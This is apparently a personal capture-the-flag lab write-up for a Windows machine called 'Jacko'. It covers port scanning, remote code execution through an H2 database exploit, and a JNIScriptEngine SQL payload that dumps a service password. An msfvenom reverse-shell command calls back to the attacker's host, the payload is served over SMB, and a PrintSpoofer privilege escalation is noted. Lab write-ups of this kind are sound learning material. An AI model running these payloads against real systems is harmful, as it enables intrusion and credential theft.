🪟Jacko

IP: 192.168.65.66

Enumeration

Nmap scan

nmap 192.168.65.66 -sV -p- -A

Service Enumeration

TCP/80

TCP/135

TCP/139/445

Went back and tried to connect to the shares with tony's credentials but neither shared worked.

TCP/7680

TCP/8082

The credentials already in the form will work to log in, just hit connect.

Found tony as username.

LFI

Found version numbers.

Found exploit in exploit-db for this exact version. https://www.exploit-db.com/exploits/49384 Confirmed RCE.

Found some credentials in wrapper.conf

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd /c type wrapper.conf").getInputStream()).useDelimiter("\\Z").next()');

Found tony's credentials. wrapper.ntservice.account=.\tony wrapper.ntservice.password=BeyondLakeBarber399

Had to get a hint here as none of the shells I kept trying worked and had to look at two or three different methods in different walk throughs.

Created reverse shell.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.65 LPORT=8082 -f exe -a x64 --platform windows -b '\x00' -e x64/xor_dynamic -o revshell.exe

Hosted it via SMB.

sudo smbserver.py -smb2support Share $PWD

Ran my listener and got a shell.

Fixed path because only few commands were running.

set PATH=%PATH%C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;

Possible printspooler lpe.

I believe this may be vulnerable to a printer nightmare attack. Curled printspoofer.exe to tony's desktop. https://github.com/dievus/printspoofer

Root

PreviousShenzi NextDVR4 - qued

Last updated 2 years ago

Was this helpful?